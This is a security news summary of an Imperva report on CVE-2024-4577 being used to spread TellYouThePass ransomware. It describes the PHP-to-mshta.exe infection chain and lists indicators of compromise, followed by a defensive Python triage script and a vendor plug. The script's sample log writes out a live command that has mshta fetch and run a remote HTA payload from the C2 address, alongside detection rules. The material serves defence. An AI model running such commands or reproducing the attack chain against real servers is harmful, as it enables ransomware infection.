
Urgent: CVE-2024-4577 Exploited to Spread ‘TellYouThePass’ Ransomware

Original Post: Update: CVE-2024-4577 quickly weaponized to distribute “TellYouThePass” Ransomware

The report from Imperva Threat Research discusses recent malicious activities exploiting the PHP vulnerability CVE-2024-4577. Detected since June 8th, these attacks have been linked to the "TellYouThePass" ransomware campaign, which targets both Windows and Linux systems. This ransomware has been active since 2019, previously utilizing vulnerabilities like CVE-2021-44228 (Apache Log4j) and CVE-2023-46604.

Attack Vector:

Attackers use the PHP vulnerability to execute arbitrary code, abusing PHP's system() function to launch mshta.exe, which runs an HTML Application (HTA) file; relying on a built-in Windows binary in this way is a "living off the land" approach.

Sample Analysis:

  • An HTA file containing malicious VBScript is used for initial infection.
  • The VBScript decodes a binary loaded into memory during runtime, revealing a .NET variant of TellYouThePass ransomware.
  • The executable sends machine details to a command-and-control (C2) server, enumerates directories, kills processes, generates encryption keys, and encrypts files, leaving a ransom note for the victim.

Community Response:

Imperva has tracked discussions about the ransomware on forums like Bleeping Computer and platforms like X. They are continuously monitoring the threat for updates.

Recommendations:

  • Patch vulnerabilities promptly.
  • Use products like Imperva’s Web Application Firewall to intercept emerging threats.
  • Employ Anti-Virus programs to defend against malware campaigns.

Indicators of Compromise (IoCs):

  • URL: hxxp://88.218.76[.]13/dd3.hta
  • C2 IP: 88.218.76[.]13
  • Sample Hashes:
    • HTA: 95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3
    • HTA: 5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618
    • .NET Binary: 9562AD2C173B107A2BAA7A4986825B52E881A935DEB4356BF8B80B1EC6D41C53
  • Bitcoin Wallet: bc1qnuxx83nd4keeegrumtnu8kup8g02yzgff6z53l
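The process chain in the Attack Vector section (a PHP CGI process launching mshta.exe against a remote .hta) and the indicators above can be turned into a simple triage check over endpoint process-creation logs. The following is an added example written for this summary, not code from Imperva or from the original post; the log line format, field names and sample events are constructed assumptions, while the hash and IP values are the ones published above.

```python
"""Defender-side triage: flag a web/PHP process spawning mshta.exe with a
remote .hta, and match hashes / the C2 address against the published IoCs.

Added example, not Imperva's code. The log format below is an assumption
and the sample events are constructed for demonstration."""

import re
from dataclasses import dataclass, field

# IoCs as published in the write-up (defanging removed so they can be matched).
IOC_C2_IP = "88.218.76.13"
IOC_HASHES = {
    "95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3",
    "5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618",
    "9562ad2c173b107a2baa7a4986825b52e881a935deb4356bf8b80b1ec6d41c53",
}

# Assumed (constructed) process-creation line shape:
# <timestamp> parent=<image path> child=<image path> cmd="<command line>" [sha256=<hash>]
LOG_RE = re.compile(
    r'^(?P<ts>\S+) parent=(?P<parent>\S+) child=(?P<child>\S+) '
    r'cmd="(?P<cmd>[^"]*)"(?: sha256=(?P<sha256>[0-9a-fA-F]{64}))?$'
)

# Parents that should never be launching mshta.exe on a PHP web host.
WEB_PARENTS = {"php-cgi.exe", "php.exe", "httpd.exe", "nginx.exe", "w3wp.exe"}
HTA_URL_RE = re.compile(r'https?://\S+\.hta\b', re.IGNORECASE)


@dataclass
class Finding:
    ts: str
    reasons: list = field(default_factory=list)


def _basename(path: str) -> str:
    """Strip a Windows path down to its lowercase file name."""
    return path.rsplit("\\", 1)[-1].lower()


def triage_line(line: str):
    """Return a Finding for a suspicious line, or None for a benign one."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    reasons = []
    parent, child, cmd = _basename(m["parent"]), _basename(m["child"]), m["cmd"]
    # 1. PHP/web-server process launching mshta.exe: the chain in the report.
    if parent in WEB_PARENTS and child == "mshta.exe":
        reasons.append(f"{parent} spawned mshta.exe")
    # 2. mshta.exe fetching a remote .hta payload.
    if child == "mshta.exe" and HTA_URL_RE.search(cmd):
        reasons.append("mshta.exe invoked with remote .hta URL")
    # 3. Published C2 address anywhere on the command line.
    if IOC_C2_IP in cmd:
        reasons.append("command line references known C2 IP")
    # 4. Launched image matches a published sample hash.
    if (m["sha256"] or "").lower() in IOC_HASHES:
        reasons.append("sha256 matches published sample hash")
    return Finding(m["ts"], reasons) if reasons else None


def triage(lines):
    """Run triage_line over an iterable of log lines, keeping only hits."""
    return [f for f in (triage_line(l) for l in lines) if f]


# Constructed sample events: one mirrors the reported chain, one a dropped
# binary carrying the published .NET hash, one ordinary activity.
SAMPLE_LOG = [
    '2024-06-08T10:00:01Z parent=C:\\php\\php-cgi.exe child=C:\\Windows\\System32\\mshta.exe '
    'cmd="mshta http://88.218.76.13/dd3.hta"',
    '2024-06-08T10:00:02Z parent=C:\\Windows\\System32\\mshta.exe child=C:\\Users\\Public\\svc.exe '
    'cmd="svc.exe" sha256=9562AD2C173B107A2BAA7A4986825B52E881A935DEB4356BF8B80B1EC6D41C53',
    '2024-06-08T10:05:00Z parent=C:\\Windows\\explorer.exe child=C:\\Windows\\System32\\notepad.exe '
    'cmd="notepad.exe readme.txt"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f.ts, "->", "; ".join(f.reasons))
```

The first rule is the one worth keeping even after the published hashes stop matching: a PHP CGI or web-server process should not be a parent of mshta.exe, so that parent/child pair is a durable detection for this living-off-the-land pattern regardless of which payload URL or sample is in use.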

Imperva offers a 30-day free trial for businesses to protect their systems.
